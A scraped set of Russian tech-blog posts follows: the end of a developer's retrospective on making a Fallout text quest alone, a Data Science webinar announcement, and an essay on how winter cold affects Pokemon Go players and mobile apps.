Не буду погружаться в излишние детали, но первая серьёзная задача, которая передо мной возникла — это искусственный интеллект. Если для логических задачек всё можно было вынести в скрипты, то вот с боёвкой я решил закопать всё жестко в коде. И это был интересный, но времязатратный момент разработки игры.
Конечно, великий рандом здесь рулит. Но надо было сделать хоть какое-то подобие осмысленности борьбы со стороны компьютера. А вот сама по себе модель боя была позаимствована от некогда крайне популярного «Бойцовского клуба», или просто БК. И адаптирована под Fallout. Выбираешь, куда бить, наносишь удар и получаешь аналогичный ответ.
Но это ладно. А для прохождения некоторых заданий (квестов) требуется инвентарь. И вот здесь я реально встрял на месяцок — другой.
Нет, сам по себе инвентарь — штука не сложная. Даже наоборот. Встрял я на написании drug&drop для него. Правда, сейчас я помню только, что он вызвал много неприличных слов!
Когда поборол проблему с перетаскиванием предметов, то оставались лишь мелкие детали, вроде просмотра голодисков (holodisk), отображения журнала заданий и т.п. мелочи. Надо проверять дно, чтобы не встретиться с камнем
Но… был уже 2008 год. Вышел и прошел с аншлагом Fallout 3 – эдакий The Elder Scrolls в мире Пустоши. Поколение геймеров давно сменилось, и те, на кого был рассчитан текстовый квест Fallout: The X-Project уже либо перестали играть совсем, либо потеряли всякий интерес к подобного рода играм.
Но я ничуть не жалею о полученном опыте, ведь я доказал себе, да и всем остальным, следующие вещи: Можно написать программу не обладая изначально никакими знаниями в области программирования, и не обучаясь по данной специальности где-либо.
Даже в одиночку можно создать компьютерную игру, за которую не будет стыдно (привет GameMaker'у и иже с ним).
Разрабатывая игры, получаешь массу удовольствия!
А еще на собственном опыте выяснил, что: У проекта обязан быть deadline !
Перед тем, как что-то начинать делать, надо очень внимательно изучить, понадобится ли это кому-то, кроме тебя самого. Банальность, но это грабли, на которые все продолжают и продолжают наступать.
Система контроля версий — это просто супер-вещь!
ООП — это еще круче, чем система контроля версий.
Читать большие тексты мало кто любит.
Но уж если предстоит читать тексты, то надо делать чтение УДОБНЫМ ! В моём случае стиль победил удобство, что оказалось большой ошибкой.
Необходимо продумывать каналы распространения еще ДО начала работы над проектом.
Найти соратников, которые будут не только трепаться языком, но и что-то делать вполне реально. Но не просто.
Совмещать несколько позиций команды в одном человеке — не продуктивно. Постоянное переключение между задачами негативно сказывается на скорости работы.
Создавать игру в рамках готового сеттинга (вселенной) проще, чем делать с 0.
На этапе проектирования уже стоит убирать лишнее. Всё равно не войдёт в финальный релиз, но время съест. Так, например, в игре отсутствует перемещение между городами (карта мира), хотя изначально она предполагалась.
Компьютерная игра — это сплав различных ингредиентов. Поэтому тут либо нужны все специалисты, либо ты должен уметь всё это делать сам.
Рано или поздно упорство вознаграждается. Но чтобы это не было поздно, см. п.1
А еще этот волшебный момент, когда твоя игра компилируется без ошибок, запускается, и в ней всё именно так, как ты и задумывал. Это волшебство, ради которого стоит тратить свои усилия! Хозяйке на заметку
Приводить список литературы не стану, т. к. он уже давно не актуален.
→ А вот поковырять исходные коды, при желании, можно на Гитхабе
→ Сама игра , если любопытно | https://habrahabr.ru/post/317688/ |
habrahabr | Вебинар: Введение в Data Science | ['flyelephant', 'вебинар', 'Data Science', 'Data Mining', 'Machine Learning', 'deep learning', 'bigdata'] |
Команда FlyElephant приглашает всех 21 декабря в 18.00 (EET) на вебинар «Введение в Data Science». В его рамках мы рассмотрим на примерах, что такое Data Science, Data Mining, Machine Learning... | Команда FlyElephant приглашает всех 21 декабря в 18.00 (EET) на вебинар «Введение в Data Science» . В его рамках мы рассмотрим на примерах, что такое Data Science, Data Mining, Machine Learning и Deep Learning, кто такой data scientist и какими инструментами он пользуется для сбора, хранения, обработки и визуализации данных. Поговорим о платформе FlyElephant и чем она может быть полезна для работы data scientist’а.
Зарегистрироваться на вебинар можно здесь . | https://habrahabr.ru/company/flyelephant/blog/317690/ |
habrahabr | Покемоны замерзли. Как реальная реальность влияет на дополненную и на мобильные приложения в целом | ['покемоны', 'мобильные приложения', 'дополненная реальность'] | Основной хайп по покемонам уже прошёл, однако они являются отличным примером, на котором можно показывать и обсуждать всякие интересные вещи — например, вопросы безопасности мобильных приложений.... | Основной хайп по покемонам уже прошёл, однако они являются отличным примером, на котором можно показывать и обсуждать всякие интересные вещи — например, вопросы безопасности мобильных приложений. Или принципы того, как можно оседлать волну хайпа и раскрутить свой бренд (очень крутой доклад был у Вячеслава Грабчака на эту тему). А сегодня мы поговорим про то, как реальная реальность (простите за нарочитый каламбур) влияет на дополненную. И что вы можете с этим сделать. Постановка задачи
Зима пала незаметно как на российские снегоуборочные службы, так и на Niantic, разработчика покемонов. То, что у них есть хоть что-то общего, никоим образом не радует. Разберёмся, что они могли сделать, чтобы приготовиться к зиме, и что они действительно сделали.
Чтобы понять масштаб проблемы, достаточно пойти на реддит и почитать зимние топики. Игроки массово пишут про мгновенно умирающие аккумуляторы, про заледеневшие пальцы, про то, что они таки поймали их всех — но при этом легли в больницу с воспалением легких и прочими простудными заболеваниями. Всё больше людей предпочитает короткие перебежки и уютные домашние игры упоротой борьбе в поисках окаянных тварей. Решение?
Казалось бы — генерал Moroz, который победил французов, неостановим, и Niantic с этим сделать ничего не сможет. Но это же не так! Давайте вспомним университетский курс теории решения изобретательских задач и придумаем, как мы можем если не противодействовать коварной природе, то хотя бы смягчить её жестокое холодное дыхание. Не скажу, что хорошо помню ТРИЗ, но вынес оттуда, что практически любое физическое противоречие можно разрешить
А. Разделением противоречивых свойств во времени.
Б. Разделением противоречивых свойств в пространстве.
В. Разделением противоречивых свойств путем использования переходных состоянии, при которых сосуществуют или попеременно появляются противоположные свойства.
Собственно, противоречиво у нас то, что тёплый пользователь должен вынимать свои нежные пальцы дабы играть в беспощадную холодную погоду — и становится при этом холодным и печальным пользователем. Метод А. Разделение по времени
Пользователи замерзают, хватит это терпеть! Можно просто приостановить игру до весны. Необязательно полностью её выключать, достаточно не проводить ивентов и не вводить обновления. Заодно можно наконец переписать свой кривой код. Это было бы неплохим решением и показало лояльность к пользователям, но… Это потери денег! Недопустимо. Отметаем. Метод Б. Разделение в пространстве.
Всё гениальное просто. Давайте объявим зиму, и расселим покемонов по домам! Можно же просто привязать их к точкам, где ловить их будет тепло и приятно. Тем более — будут рады партнёры, у которых явно станет больше покупателей… Чем плохо это решение? Ну, придётся делать разные модели поведения для каждой локации. Не везде зима так сурова, как в России, и пользователи тёплых стран обоснованно будут огорчены таким решением. Но оно всё же лучше, чем метод А. Метод В. Разделение по состоянию.
Мой любимый метод — тут начинается самое интересное! Проблемой является холодное и недовольное состояние пользователя. В идеале нам бы сделать его довольным и тёплым… Но скажем честно — если он доволен и пользуется приложением, то пускай хоть посинеет.
Что является причиной того, что пользователь мёрзнет? То, что геймплей состоит из двух основных действий, которые могут длиться долго и для которых нужны пальцы и точные жесты — это война за джимы и захват покемонов. Подойти к этой проблеме можно с двух сторон — можно изменить состояние пользователя, и можно изменить геймплей.
Ни для кого не секрет, что у многих смартфонов есть режим работы в перчатках, и есть перчатки, которые умеют работать с обыкновенными экранами. Но точность оставляет желать лучшего. И это нам совершенно не подходит в случае покемонов. То есть, решение с изменением геймплея не выходит… Или подождите? Если вы внимательно следили за Niantic, то наверняка знаете, что они выпустили специальные браслеты (Go Plus) для игры в Pokemon go, которые позволяют ловить покемонов и обирать покестопы одной кнопкой. К сожалению, они не решают проблему замерзания во время волны за джимы… Но хотя бы можно бегать и ловить покемонов! Что уже достаточно для многих игроков. То есть, Niantic таки использовал этот принцип. Возможно, не нарочно, и цель была совершенно другая — но всё же.
Что же, теперь про состояние пользователя. Конечно, согреть нам его довольно сложно… Однако есть хоть какие-то варианты сделать его чуть более тёплым и довольным. А именно — организовать сезонную продажу специального зимнего оборудования для ловли покемонов! Шапки, кружки-термосы, шарфы, мобильные зарядные устройства, которые позволят играть дольше, перчатки со специальными пальчиками и подогревом… Можно повысить как лояльность пользователей, так и узнаваемость бренда! Но… Увы, пока Niantic этого не сделал. Хотя недавняя новость о партнерстве со старбаксом заставляет задуматься.
И ещё раз про состояние пользователя с другой стороны. Пускай ходит холодным… Но всё равно играет! Надо увеличить его степень вовлечённости! Зима? Не вопрос! Достаточно создать достаточно сильный стимул для того, чтобы игрок вышел на мороз! Ивенты! Изменения! Сияющие покемоны! Покемоны-дети! Ввод второго поколения покемонов! Ежедневные бонусы, которые заставят вспомнить про игру и вынуть руки на холод! И… Самое грустное, что Niantic пользуется именно таким подходом. Всё, о чём было написано в этом параграфе, или было, или будет в ближайшее время. Печально — но, видимо, деньги не мёрзнут. В отличие от игроков. Вместо вывода
А если немного отвлечься от покемонов, то станет понятно, что проблема использования устройств зимой на улице весьма глобальна. И затрагивает она огромное количество приложений — начиная от музыкального плеера, продолжая навигационными приложениями, приложениями с дополненной реальностью и заканчивая, например, приложениями для курьеров или служб ЖКХ. И всем приходится что-то делать с тем, что зимой пользователи элементарно не хотят мёрзнуть. Я уже не говорю, скажем, про Якутию, где вынуть руку из перчатки в -50 на улице это героизм, граничащий с глупостью.
В комментариях интересно было бы услышать тех, кто сталкивался с такими проблемами — страшно интересно, на что ещё могли повлиять внешние, и как с этим боролись. | https://geektimes.ru/post/283732/ |